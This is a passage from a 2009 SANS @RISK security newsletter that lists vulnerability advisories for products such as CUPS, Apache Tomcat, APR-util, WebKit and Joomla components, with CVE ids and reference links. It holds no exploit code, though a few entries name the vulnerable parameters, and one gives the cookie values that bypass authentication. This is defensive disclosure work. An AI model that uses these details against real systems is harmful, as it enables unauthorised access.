  • Description: eBay Enhanced Picture Service ActiveX control is an application that allows a seller to upload pictures to an auction. The application is available for Microsoft Windows. The eBay Enhanced Picture Services ActiveX control is exposed to a remote code execution issue. Successfully exploiting this issue will allow attackers to execute arbitrary code within the context of the affected application that uses the ActiveX control.
  • Ref: http://www.securityfocus.com/bid/35266
  • 09.24.33 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Derivco ActiveX Control Unspecified Security
  • Description: Derivco ActiveX control is prone to an unspecified security vulnerability. The ActiveX control can be identified by CLSID: D8089245-3211-40F6-819B-9E5E92CD61A2. Attackers may exploit this issue by enticing an unsuspecting victim to view a malicious webpage.
  • Ref: http://www.microsoft.com/technet/security/advisory/969898.mspx
  • 09.24.34 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun Solaris Kerberos Credential Management Security Bypass
  • Description: Solaris Kerberos is exposed to a security-bypass issuue that affects the Kerberos credential cache management. Successful exploitation may allow a local attacker to gain unauthorized access to Kerberized NFS mount points.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-252787-1
  • 09.24.35 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun OpenSolaris "idmap(1M)" Local Denial of Service
  • Description: Sun OpenSolaris is a UNIX-based operating system. OpenSolaris is exposed to a local denial of service issue. Specifically, an unspecified problem occurs in the idmap(1M) command that can allow local users to kill the "idpmapd(1M)" daemon on a CIFS (Common Internet File System/Windows file service) server. OpenSolaris builds snv_88 through snv_110 are affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-260508-1
  • 09.24.36 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun Solaris "rpc.nisd(1M)" Daemon NIS+ Server Remote Denial of Service
  • Description: Sun Solaris "rpc.nisd(1M)" daemon may allow remote attackers to crash an instance of the NIS+ server. Specifically, an unspecified error in the "rpc.nisd(1M)" allows remote attackers to exploit this issue to cause the NIS+ service to stop responding to further requests from NIS+ clients. Sun Solaris 8, Solaris 9, Solaris 10, and OpenSolaris based upon builds snv_01 through snv_103 are affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-256748-1
  • 09.24.37 - CVE: Not Available
  • Platform: Aix
  • Title: IBM AIX "portmapper" Remote Denial of Service
  • Description: IBM AIX is a UNIX-based operating system. AIX is exposed to a remote denial of service issue in an unspecified function of "libtli" in the "portmapper" service. AIX version 5.3 is affected.
  • Ref: http://www.securityfocus.com/bid/35211
  • 09.24.38 - CVE: CVE-2009-1196
  • Platform: Unix
  • Title: CUPS Scheduler Directory Services Remote Denial of Service
  • Description: CUPS (Common UNIX Printing System) is a widely used set of printing utilities for UNIX-based systems. The application is exposed to a denial of service issue caused by a use-after-free error. This issue affects the scheduler directory services routine. The attacker can exploit this issue to crash the affected application, denying service to legitimate users.
  • Ref: https://bugzilla.redhat.com/show_bug.cgi?id=497135
  • 09.24.39 - CVE: CVE-2009-0791
  • Platform: Unix
  • Title: CUPS PDF File Multiple Heap Buffer Overflow Vulnerabilities
  • Description: CUPS (Common UNIX Printing System) is a widely used set of printing utilities for UNIX-based systems. CUPS is exposed to multiple remote heap-based buffer overflow issues because it fails to properly bounds check user-supplied input before copying it into a finite-sized buffer. Specifically, the problem occurs in the CUPS "pdftops" filter when handling malformed PDF documents.
  • Ref: https://bugzilla.redhat.com/show_bug.cgi?id=491840
  • 09.24.40 - CVE: CVE-2009-0033
  • Platform: Cross Platform
  • Title: Apache Tomcat Java AJP Connector Invalid Header Denial of Service
  • Description: Apache Tomcat is a Java-based webserver for multiple operating systems. Tomcat is exposed to a denial of service issue that occurs when the Java AJP connector receives a request containing invalid headers. This will cause the "mod_jk" load balancing worker to fall into an invalid state.
  • Ref: http://www.securityfocus.com/archive/1/504044
  • 09.24.41 - CVE: CVE-2009-0580
  • Platform: Cross Platform
  • Title: Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
  • Description: The application is exposed to a username enumeration weakness because it displays different responses to login attempts, depending on whether or not the username exists. Specifically, this issue occurs when Form Authentication is enabled and the server is configured to use any of the following authentication realms: "MemoryRealm. DataSourceRealm, JDBCRealm".
  • Ref: http://www.securityfocus.com/archive/1/504125
  • 09.24.42 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Hitachi Web Server Reverse Proxy Denial of Service
  • Description: Hitachi Web Server is a web application server available for multiple operating systems. Hitachi Web Server is exposed to a denial of service issue because the reverse proxy function fails to properly handle invalid responses from a remote backend server. Attackers may exploit this issue to cause denial of service conditions. Ref: http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS07-039/index.html
  • 09.24.43 - CVE: CVE-2009-0023
  • Platform: Cross Platform
  • Title: Apache APR-util "apr_strmatch_precompile()" Integer Underflow
  • Description: Apache "APR-util" is a library of utility functions used by several software applications, including the Apache HTTP server. "APR-util" is exposed to an integer-underflow issue. This error affects the "apr_strmatch_precompile()" function in the "strmatch/apr_strmatch.c" source file. "APR-util" versions prior to 1.3.5 are affected.
  • Ref: http://svn.apache.org/viewvc?view=rev&revision=779880
  • 09.24.44 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Online Armor Personal Firewall IOCTL Request Local Privilege Escalation
  • Description: Online Armor Personal Firewall is a security suite for Microsoft Windows operating systems. The application is exposed to a local privilege escalation issue because the application fails to properly validate address space when the "OAmon.sys" device driver process IOCTL requests. Online Armor Personal Firewall versions 3.5.0.12 and earlier are affected.
  • Ref: http://www.ntinternals.org/ntiadv0806/ntiadv0806.html
  • 09.24.45 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun GlassFish Enterprise Server HTTP Engine/Admin Interface Local Denial of Service
  • Description: Sun GlassFish Enterprise Server is a web application framework. The software is exposed to a local denial of service issue that affects the HTTP Engine and the administration interface. GlassFish Enterprise Server version 2.1 is affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-258528-1
  • 09.24.46 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Libpng 1-bit Interlaced Images Information Disclosure
  • Description: The "libpng" library is a PNG reference library. The library is exposed to an information disclosure issue that stems from an error in parsing crafted 1-bit (2-color) interlaced images whose widths are not divisible by 8. This may allow an attacker to obtain several uninitialized bits from certain rows of the interlaced images. libpng versions prior to 1.2.37 are affected.
  • Ref: http://www.securityfocus.com/bid/35233
  • 09.24.47 - CVE: Not Available
  • Platform: Cross Platform
  • Title: XM Easy Personal FTP Server Multiple Command Remote Buffer Overflow Vulnerabilities
  • Description: XM Easy Personal FTP Server is a FTP server application available for Microsoft Windows. The application is exposed to multiple remote buffer overflow issues because the software fails to sufficiently sanitize user-supplied arguments to the "HELP" and "TYPE" FTP commands. XM Easy Personal FTP Server version 5.7.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/504122
  • 09.24.48 - CVE: Not Available
  • Platform: Cross Platform
  • Title: HP Discovery and Dependency Mapping Inventory Unauthorized Access
  • Description: HP Discovery and Dependency Mapping Inventory (DDMI) is an asset management application. The software is exposed to an unspecified unauthorized-access issue that affects the RGS Sender when running Easy Login.
  • Ref: http://www.securityfocus.com/bid/35250
  • 09.24.49 - CVE: CVE-2009-1956
  • Platform: Cross Platform
  • Title: Apache APR-util "apr_brigade_vprintf" Off By One
  • Description: Apache "APR-util" is a library of utility functions used by several software applications, including the Apache HTTP server. Apache "APR-util" is exposed to an off-by-one issue that may allow attackers to obtain sensitive information or trigger a denial of service condition. This issue results from a design error and affects the "apr_brigade_vprintf" function of the library. "APR-util" versions prior to 1.3.5 on big-endian platforms are affected.
  • Ref: http://www.apache.org/dist/apr/CHANGES-APR-UTIL-1.3
  • 09.24.50 - CVE: CVE-2009-1955
  • Platform: Cross Platform
  • Title: Apache APR-util "xml/apr_xml.c" Denial of Service
  • Description: Apache "APR-util" is a library of utility functions used by several software applications, including the Apache HTTP server. Apache "APR-util" is exposed to a denial of service issue. Specifically, the issue affects the expat XML parser in the "apr_xml_*" interface of the "xml/apr_xml.c" file. "APR-util" versions prior to 1.3.7 are affected.
  • Ref: http://www.apache.org/dist/apr/CHANGES-APR-UTIL-1.3
  • 09.24.51 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Serene Bach Session Hijacking
  • Description: Serene Bach is a Japanese blogging application. The application is exposed to a session-hijacking issue. The application fails to protect session identifiers and may create predictable session ID sequences. This may allow an attacker to gain access to the affected application by guessing a valid session ID. Serene Bach versions prior to 2.21R are affected.
  • Ref: http://www.securityfocus.com/bid/35254
  • 09.24.52 - CVE: Not Available
  • Platform: Cross Platform
  • Title: wxWidgets Multiple Security Vulnerabilities
  • Description: wxWidgets is a library and API for creating GUI applications on multiple platforms. The library is exposed to multiple security issues. Exploiting these issues may allow remote attackers to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial of service. Ref: http://svn.wxwidgets.org/svn/wx/wxWidgets/branches/WX_2_8_BRANCH/docs/changes.txt
  • 10.5.7, - CVE: CVE-2009-1718, CVE-2009-1715, CVE-2009-1714,CVE-2009-1713, CVE-2009-1712, CVE-2009-1711, CVE-2009-1710,CVE-2009-1709, CVE-2009-1703, CVE-2009-1702, CVE-2009-1701,CVE-2009-1700, CVE-2009-1699, CVE-2009-1698, CVE-2009-1697,CVE-2009-1696, CVE-2009-1695,
  • Platform: Cross Platform
  • Title: Apple Safari Prior to 4.0 Multiple Security Vulnerabilities
  • Description: Apple Safari is a web browser available for Mac OS X and Microsoft Windows. Safari is exposed to multiple security issues. Attackers may exploit these issues to execute arbitrary code, launch cross-site scripting attacks, elevate privileges, or obtain sensitive information. Safari versions prior to 4.0 running on Apple Mac OS X
  • Ref: http://www.zerodayinitiative.com/advisories/ZDI-09-034/
  • 09.24.54 - CVE: CVE-2009-1760
  • Platform: Cross Platform
  • Title: Rasterbar Software libtorrent Arbitrary File Overwrite
  • Description: The "libtorrent" library is a BitTorrent library available for multiple platforms. The library is exposed to an arbitrary file overwrite issue that occurs due to a failure to handle malformed data contained in a ".torrent" BitTorrent file. Specifically, the library fails to properly validate "path" elements used to specify file locations. libtorrent versions prior to 0.14.4 are affected.
  • Ref: http://census-labs.com/news/2009/06/08/libtorrent-rasterbar/
  • 09.24.55 - CVE: CVE-2009-1697
  • Platform: Cross Platform
  • Title: WebKit "XMLHttpRequest" HTTP Response Splitting
  • Description: WebKit is a browser framework used in multiple applications, including Apple Safari and Google Chrome browsers. WebKit is exposed to an HTTP response-splitting issue because it fails to adequately sanitize user-supplied input. This issue can occur because CRLF characters may be injected into "XMLHttpRequest" headers. When the request does not contain a "Host" header, the same-origin policy can be bypassed, allowing attacker-supplied JavaScript to interact with other sites hosted on the same server.
  • Ref: http://www.securityfocus.com/archive/1/504187
  • 09.24.56 - CVE: CVE-2009-1690
  • Platform: Cross Platform
  • Title: WebKit DOM Event Handler Remote Memory Corruption
  • Description: WebKit is a browser framework used in multiple applications, including Apple Safari and Google Chrome browsers. WebKit is exposed to a remote memory corruption issue because it fails to handle recursion over unspecified DOM events. Very few details are available regarding this issue. Ref: http://googlechromereleases.blogspot.com/2009/06/stable-update-2-webkit-security-fixes.html
  • 09.24.57 - CVE: CVE-2008-5515
  • Platform: Cross Platform
  • Title: Apache Tomcat "RequestDispatcher" Information Disclosure
  • Description: Apache Tomcat is a Java-based web server for multiple operating systems. The application is exposed to a remote information disclosure issue that exists in the "RequestDispatcher". An attacker can exploit this issue by constructing and submitting a specially crafted request parameter. Apache Tomcat versions 6.0.0 through 6.0.18, 5.5.0 through 5.5.27 and 4.1.0 through 4.1.39 are affected. Ref: http://www.fujitsu.com/global/support/software/security/products-f/interstage-200902e.html
  • 09.24.58 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM OS/400 JVA-RUN JDK6.0 XML Digital Signature Unspecified Security
  • Description: IBM OS/400 is an operating system for IBM Power systems. IBM OS/400 is exposed to an unspecified issue that occurs due to an error in XML Digital Signature verification process. IBM OS/400 versions V6R1M0 and V5R4M0 are affected. Ref: http://www-01.ibm.com/support/docview.wss?uid=nas2e858199605d67111862575cc003c7276
  • 09.24.59 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PDFlib Lite PNG Image Size Integer Overflow
  • Description: PDFlib Lite is a library used to construct PDF files. The library is exposed to an integer overflow issue because it fails to perform adequate boundary checks on user-supplied data before using it to allocate memory buffers. This issue occurs when processing malformed PNG images. PDFlib Lite versions prior to 7.0.4p4 are affected.
  • Ref: http://www.securityfocus.com/bid/35266
  • 09.24.60 - CVE: CVE-2009-1420
  • Platform: Cross Platform
  • Title: HP OpenView Network Node Manager SNMP and MIB Unspecified Remote Code Execution
  • Description: HP OpenView Network Node Manager (NNM) is a fault management application for IP networks. The application is exposed to a remote code execution issue caused by an unspecified error. This issue occurs when the application is configured with SNMP (Simple Network Management Protocol) and MIB (Management Information Base). NNM versions 7.51, and 7.53 are affected.
  • Ref: http://www.securityfocus.com/archive/1/504183
  • 09.24.61 - CVE: CVE-2009-1718
  • Platform: Cross Platform
  • Title: WebKit Drag Event Remote Information Disclosure
  • Description: WebKit is a browser framework used in multiple applications, including Apple Safari and Google Chrome browsers. WebKit is exposed to a remote information disclosure issue related to the drag-and-drop functionality. Specifically, this issue allows a malicious webpage to access sensitive information when content is dragged across the browser window. Ref: http://googlechromereleases.blogspot.com/2009/06/stable-update-2-webkit-security-fixes.html
  • 09.24.62 - CVE: CVE-2009-2011
  • Platform: Cross Platform
  • Title: Worldweaver DX Studio Player Browser Plugin Remote Arbitrary Shell Command Injection
  • Description: Worldweaver DX Studio is a development environment for creating 3D graphics. The Player application is a browser plugin used for displaying DX Studio documents in Internet Explorer or Firefox. The application is exposed to a remote command injection issue because it fails to adequately sanitize user-supplied input data. Specifically, commands sent to the "shell.execute()" method will execute without warning in the Firefox plugin. DX Studio Player versions prior to 3.0.29.1 are affected.
  • Ref: http://www.coresecurity.com/content/DXStudio-player-firefox-plugin
  • 09.24.63 - CVE: CVE-2009-1162
  • Platform: Web Application - Cross Site Scripting
  • Title: IronPort AsyncOS Spam Quarantine Login Cross-Site Scripting
  • Description: Cisco IronPort appliances are used for email and web security. IronPort AsyncOS is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input. This issue affects the "referrer" parameter to the Spam Quarantine login page. IronPort series C, M, and X appliances running AsyncOS versions prior to 6.5.2 are affected.
  • Ref: http://tools.cisco.com/security/center/viewAlert.x?alertId=18365
  • 09.24.64 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Sun Java System Web Server Reverse Proxy Plug-in Cross-Site Scripting
  • Description: Sun Java System Web Server is an enterprise-level web server application. The application is exposed to a cross-site scripting issue because it fails to properly sanitize unspecified user-supplied input to the Reverse Proxy plug-in. Sun Java System Web Server version 6.1 on SPARC, x86, Linux, Windows, HP-UX, and AIX platforms is affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-259588-1
  • 09.24.65 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: moziloCMS Multiple Cross-Site Scripting Vulnerabilities
  • Description: moziloCMS is a web-based content manager implemented in PHP. The application is exposed to multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied data to the "cat" and "file" parameters of the "admin/index.php" script when the "action" parameter is set to "editsite". moziloCMS version 1.11.1 is affected.
  • Ref: http://www.securityfocus.com/archive/1/504091
  • 09.24.66 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Kerio MailServer WebMail Cross-Site Scripting
  • Description: Kerio MailServer is a mail manager used as an alternative to Microsoft Exchange. WebMail is a mail client for the Kerio MailServer. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input. This issue affects the Integration page. Kerio MailServer versions 6.6.0, 6.6.1, 6.6.2, and 6.7.0 are affected.
  • Ref: http://www.kerio.com/support/security-advisories#0906
  • 09.24.67 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Seminar for Joomla! "id" Parameter SQL Injection
  • Description: Seminar for Joomla! is a event booking component for the Joomla! content manager. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "com_seminar" component before using it an SQL query. Seminar for Joomla! version 1.28 is affected.
  • Ref: http://www.securityfocus.com/bid/35192
  • 09.24.68 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! and Mambo "com_mosres" Component Multiple SQL Injection Vulnerabilities
  • Description: The "com_momres" component is a PHP-based application for the Mambo and Joomla! content managers. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "property_uid" and "regID" parameters of the "com_momres" component before using it in an SQL query. "com_momres" version 1.0f is affected.
  • Ref: http://www.milw0rm.com/exploits/8872
  • 09.24.69 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! ComSchool Component "classid" Parameter SQL Injection
  • Description: ComSchool is an education component for the Joomla! content manager. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "classid" parameter of the "com_school" component before using it an SQL query. ComSchool version 1.4 is affected.
  • Ref: http://www.securityfocus.com/bid/35257
  • 09.24.70 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! AkoBook Component "Itemid" Parameter SQL Injection
  • Description: AkoBook is a guestbook component for the Joomla! content manager. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "Itemid" parameter of the "com_akobook" component before using it an SQL query.AkoBook SE version 2.3 is affected.
  • Ref: http://www.securityfocus.com/bid/35268
  • 09.24.71 - CVE: Not Available
  • Platform: Web Application
  • Title: Luottokunta Payment Security Bypass
  • Description: Luottokunta is a payment module for osCommerce. Luottokunta is exposed to a security bypass issue. This issue is due to an unspecified design error in when processing orders. ttackers can exploit this issue to make a purchase without paying. Successfully exploiting this issue may lead to other attacks. Luottokunta versions prior to 1.3 are affected.
  • Ref: http://www.cert.fi/haavoittuvuudet/2009/haavoittuvuus-2009-046.html
  • 09.24.72 - CVE: Not Available
  • Platform: Web Application
  • Title: Drupal Webform Module HTML Injection
  • Description: Webform is a Drupal module that is used to create questionnaires, contact forms, surveys, and other forms. The application is exposed to an HTML injection issue because it fails to sufficiently sanitize user-supplied input before using it in dynamically generated content. The issue occurs when displaying results of a Webform input submission. Webform versions prior to 5.x-2.7 and 6.x-2.7 are affected.
  • Ref: http://drupal.org/node/481268
  • 09.24.73 - CVE: Not Available
  • Platform: Web Application
  • Title: Omilen Photo Gallery Joomla! Component "controller" Parameter Local File Include
  • Description: Omilen Photo Gallery is a component for the Joomla! content manager. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "controller" parameter of the "com_omphotogallery" component. Omilen Photo Gallery version 0.5b is affected.
  • Ref: http://www.securityfocus.com/bid/35201
  • 09.24.74 - CVE: Not Available
  • Platform: Web Application
  • Title: LightNEasy Multiple HTML Injection Vulnerabilities
  • Description: LightNEasy is a web-based content manager. The application is exposed to multiple HTML injection issues because it fails to sufficiently sanitize user-supplied data to the following parameters: "commentmessage", "commentemail" and "commentname". LightNEasy versions 2.2.1 no database and 2.2.2 SQLite are affected. Ref: http://forum.intern0t.net/intern0t-advisories/1081-intern0t-lightneasy-2-2-2-html-injection-vulnerability.html
  • 09.24.75 - CVE: Not Available
  • Platform: Web Application
  • Title: LogMeIn "cfgadvanced.html" HTTP Header Injection
  • Description: LogMeIn is a secure login application. The application is exposed to an issue that allows attackers to inject arbitrary HTTP headers because it fails to sanitize input. Specifically the application fails to sanitize CRLF characters passed to the "lang" parameter passed to the "cfgadvanced.html" script. LogMeIn version 4.0.784 is affected. Ref: http://securethoughts.com/2009/06/multiple-vulnerabilities-in-logmein-web-interface-can-be-used-to-control-your-computer-and-steal-arbitary-files/
  • 09.24.76 - CVE: Not Available
  • Platform: Web Application
  • Title: Ideal MooFAQ Joomla! Component "file_includer.php" Local File Include
  • Description: MooFAQ is a component for the Joomla! content manager. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "file" parameter of the "file_includer.php" script in the "com_moofaq" component. MooFAQ version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/35259
  • 09.24.77 - CVE: Not Available
  • Platform: Web Application
  • Title: Automated Link Exchange Portal Insecure Cookie Authentication Bypass
  • Description: ZaoCMS is a web application. The application is exposed to an authentication bypass issue because it fails to adequately verify user-supplied input used for cookie-based authentication. Specifically, attackers can gain administrative access to the application by setting the "userid" cookie parameter to "1" and the "path" parameter to "/". Automated Link Exchange Portal version 1.3 is affected.
  • Ref: http://www.securityfocus.com/bid/35261
  • 09.24.78 - CVE: Not Available
  • Platform: Web Application
  • Title: Multiple OrdaSoft Joomla! Components "mosConfig_absolute_path" Remote File Include
  • Description: OrdaSoft products a number of components for the Joomla! content manager. Multiple OrdaSoft components are exposed to a remote file include issue because they fail to sufficiently sanitize user-supplied input to the "mosConfig_absolute_path" parameter of the "toolbar_ext.php" script.
  • Ref: http://www.securityfocus.com/bid/35269
  • 09.24.79 - CVE: Not Available
  • Platform: Web Application
  • Title: MoinMoin Hierarchical ACL Security Bypass
  • Description: MoinMoin is a freely available, open-source wiki written in Python. It is available for Unix and Linux platforms. The application is exposed to a security bypass issue due to an error when processing hierarchical ACLs. MoinMoin version 1.8.3 is affected.
  • Ref: http://moinmo.in/MoinMoinRelease1.8
  • 09.24.80 - CVE: Not Available
  • Platform: Network Device
  • Title: Netgear RP614 Wireless Router Cross-Site Request Forgery
  • Description: The Netgear RP614 wireless router is a network device designed for home use. The router is exposed to a cross-site request forgery issue that exists in the web administration interface. Attackers can exploit this issue by tricking a victim into visiting a malicious web page. The page will consist of specially crafted script code designed to perform some action on the attacker's behalf. Netgear RP614 running firmware 1.0.5_04.23 is affected.
  • Ref: http://holisticinfosec.org/content/view/116/45/

(c) 2009. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

Subscriptions: @RISK is distributed free of charge by the SANS Institute to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.

It was the most interesting and educational training I've ever attended. I learned more in this week than in the past year.
-Michael McAndrews, Irwin Mortgage Corp.

SANS Pen Test Hackfest 2013 - Washington

Latest Whitepapers

Building and Maintaining a "Certifiable" Workforce
By Robert J. Mavretich

How Can You Build and Leverage SNORT IDS Metrics to Reduce Risk?
By Tim Proffitt

Daisy Chain Authentication
By Courtney Imbert

Latest Tweets

NEW #SANS Survey: Security Analytics & Intelligence 2nd [...]
October 1, 2013 - 6:30 PM

Tips on how to convince your boss to let you train online wi [...]
October 1, 2013 - 6:23 PM

#2 Tip on how 2 convince your boss 2 let u train online: Fle [...]
October 1, 2013 - 3:00 PM

Contact Us

(301) 654-SANS (7267)
Mon-Fri 9am - 8pm EST/EDT
info@sans.org

"It has really been an eye opener concerning the depth of security training & awareness that SANS has to offer."
- Michael Hall, Drivesavers

"Because of the use of real-world examples it's easier to apply what you learn."
- Danny Hill, Friedkin Companies, Inc.

"SANS is a great place to enhance your technical and hands-on skills and tools. I thoroughly recommend it."
- Aaron Waugh, Datacom NZ Ltd